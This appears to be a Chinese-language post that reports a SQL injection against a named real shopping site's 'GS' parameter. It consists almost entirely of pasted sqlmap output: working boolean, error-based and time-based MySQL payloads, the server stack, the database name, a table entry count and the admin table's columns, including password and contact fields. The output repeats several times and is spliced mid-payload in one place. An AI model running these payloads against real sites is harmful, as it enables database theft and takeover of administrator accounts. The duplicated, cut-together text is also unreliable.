测试地址:https://www.koyimall.com/?act=shop.goods_view&GS=219967


测试参数:GS

 

lace: GET Parameter: GS Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: act=shop.goods_view&GS=219768 RLIKE (SELECT (CASE WHEN (9668=9668) THEN 219768 ELSE 0x28 END)) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: act=shop.goods_view&GS=219768 AND (SELECT 8273 FROM(SELECT COUNT(*),CONCAT(0x7178646671,(SELECT (CASE WHEN (8273=8273) THEN 1 ELSE 0 END)),0x71636c7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: act=shop.goods_view&GS=219768 AND SLEEP(5) --- web application technology: Nginx, PHP 5.2.5 back-end DBMS: MySQL 5.0 sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: GS Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: act=shop.goods_view&GS=219768 RLIKE (SELECT (CASE WHEN (9668=9668) THEN 219768 ELSE 0x28 END)) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: act=shop.goods_view&GS=219768 AND (SELECT 8273 FROM(SELECT COUNT(*),Csqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: GS Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: act=shop.goods_view&GS=219768 RLIKE (SELECT (CASE WHEN (9668=9668) THEN 219768 ELSE 0x28 END)) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: act=shop.goods_view&GS=219768 AND (SELECT 8273 FROM(SELECT COUNT(*),CONCAT(0x7178646671,(SELECT (CASE WHEN (8273=8273) THEN 1 ELSE 0 END)),0x71636c7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: act=shop.goods_view&GS=219768 AND SLEEP(5) --- web application technology: Nginx, PHP 5.2.5 back-end DBMS: MySQL 5.0 sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: GS Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: act=shop.goods_view&GS=219768 RLIKE (SELECT (CASE WHEN (9668=9668) THEN 219768 ELSE 0x28 END)) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: act=shop.goods_view&GS=219768 AND (SELECT 8273 FROM(SELECT COUNT(*),CONCAT(0x7178646671,(SELECT (CASE WHEN (8273=8273) THEN 1 ELSE 0 END)),0x71636c7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: act=shop.goods_view&GS=219768 AND SLEEP(5) --- web application technology: Nginx, PHP 5.2.5 back-end DBMS: MySQL 5.0 current user is DBA: False sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: GS Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: act=shop.goods_view&GS=219768 RLIKE (SELECT (CASE WHEN (9668=9668) THEN 219768 ELSE 0x28 END)) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: act=shop.goods_view&GS=219768 AND (SELECT 8273 FROM(SELECT COUNT(*),CONCAT(0x7178646671,(SELECT (CASE WHEN (8273=8273) THEN 1 ELSE 0 END)),0x71636c7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: act=shop.goods_view&GS=219768 AND SLEEP(5) --- web application technology: Nginx, PHP 5.2.5 back-end DBMS: MySQL 5.0 Database: koyimall Table: durian_buy [851 entries] sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Place: GET Parameter: GS Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: act=shop.goods_view&GS=219768 RLIKE (SELECT (CASE WHEN (9668=9668) THEN 219768 ELSE 0x28 END)) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: act=shop.goods_view&GS=219768 AND (SELECT 8273 FROM(SELECT COUNT(*),CONCAT(0x7178646671,(SELECT (CASE WHEN (8273=8273) THEN 1 ELSE 0 END)),0x71636c7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: act=shop.goods_view&GS=219768 AND SLEEP(5) --- web application technology: Nginx, PHP 5.2.5 back-end DBMS: MySQL 5.0 Database: koyimall Table: durian_admin [14 columns] +-----------------------+--------------+ | Column | Type | +-----------------------+--------------+ | admin_email | varchar(70) | | admin_id | varchar(20) | | admin_is_priv_officer | tinyint(4) | | admin_level | int(11) | | admin_memo | varchar(200) | | admin_mobile | varchar(20) | | admin_mod_date | datetime | | admin_name | varchar(30) | | admin_nick | varchar(100) | | admin_passwd | varchar(40) | | admin_reg_date | datetime | | admin_status | tinyint(4) | | admin_tel | varchar(20) | | com_seq | int(11) | +-----------------------+--------------+ sqlmap identified the following injection points with a total of 0 HTTP(s) requests: